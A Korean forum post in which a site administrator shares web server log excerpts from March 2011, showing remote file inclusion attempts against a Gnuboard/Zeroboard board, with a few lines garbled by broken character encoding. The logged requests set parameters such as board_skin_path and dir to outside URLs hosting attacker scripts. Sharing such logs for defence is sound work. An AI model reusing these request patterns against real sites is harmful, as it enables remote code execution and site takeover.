사이트 로그로 알아본 해커들 공격 유형 정보
사이트 로그로 알아본 해커들 공격 유형본문
트래픽 로그 + 스킨게시판 에러 로그로 조사해봣습니다.
어디서 뻥뻥 뚫려 웹셀이 업로드 된지는 확실히 못알아냈는데..
(로그가 하루에 1GB가 쌓여서 거의 분석이 불가능할 지경..)
그누보드 보안에 혹시나 참고가 될까 해서 올려봅니다. (중복 로그 제외)
205.209.97.120 - - [18/Mar/2011:12:05:00 +0900] "GET ///delete_all.php?board_skin_path=http://www.housevampyr.com/depot/catalog/images/hewlett_packard/id.txt
67.192.170.65 - - [18/Mar/2011:11:44:47 +0900] "GET /main/bbs//delete_comment.php?board_skin_path=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? HTTP/1.1" 200 25
74.50.5.221 - - [18/Mar/2011:13:53:15 +0900] "GET ///?_SERVER[DOCUMENT_ROOT]=http://smash2.fileave.com/zfxid1.txt???
74.50.5.221 - - [18/Mar/2011:14:03:31 +0900] "GET /main/counter.php///?_zb_path=http://smash2.fileave.com/zfxid1.txt??? HTTP/1.1" 200 144
67.192.170.65 - - [18/Mar/2011:23:21:51 +0900] "GET /main/bbs///skin/happycast_category_lightblack/login.php?dir=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? HTTP/1.1" 404 313
143.248.72.202 - - [18/Mar/2011:23:33:11 +0900] "GET /main/bbs//skin/ggambo5100_board/setup.php?setup[use_category]=1&dir=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? HTTP/1.1" 404 299
query 110313 122156 guest 94.136.63.119 /main//index.php?united=http://www.genednetwork.or.th/introduce//pic_files/id1.txt?
query 110314 035424 guest 66.249.67.135 /main/bbs/board.php?bo_table=politic&sca=占쎄퀣占쏙옙>
++++++++
++++++++++++?쒕ぉ
++++++++++++?댁슜
++++++++++++?쒕ぉ+?댁슜
++++++++++++++++++++++++?뚯썝?꾩씠??/option>
++++++++++++?뚯썝?꾩씠??肄?
++++++++++++?대쫫
++++++++++++?대쫫(肄?
++++++++++++++++++++
++++++++
++++++++
++++++++++++?쒕ぉ
++++++++++++?댁슜
++++++++++++?쒕ぉ+?댁슜
++++++++++++++++++++++++?뚯썝?꾩씠??/option>
++++++++++++?뚯썝?꾩씠??肄?
++++++++++++?대쫫
++++++++++++?대쫫(肄?
++++++++++++++++++++
++++++++
query 110314 070317 guest 91.201.66.154
/main/bbs/board.php?bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1++GET+http://agal.co.kr/main/bbs/board.php?bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1+[0,80162,119458]+-> bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1++GET+http://agal.co.kr/main/bbs/board.php?bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1+[0,80162,119458]+->
0
댓글 3개
error.log는 아직 열어보지도 못햇네요.

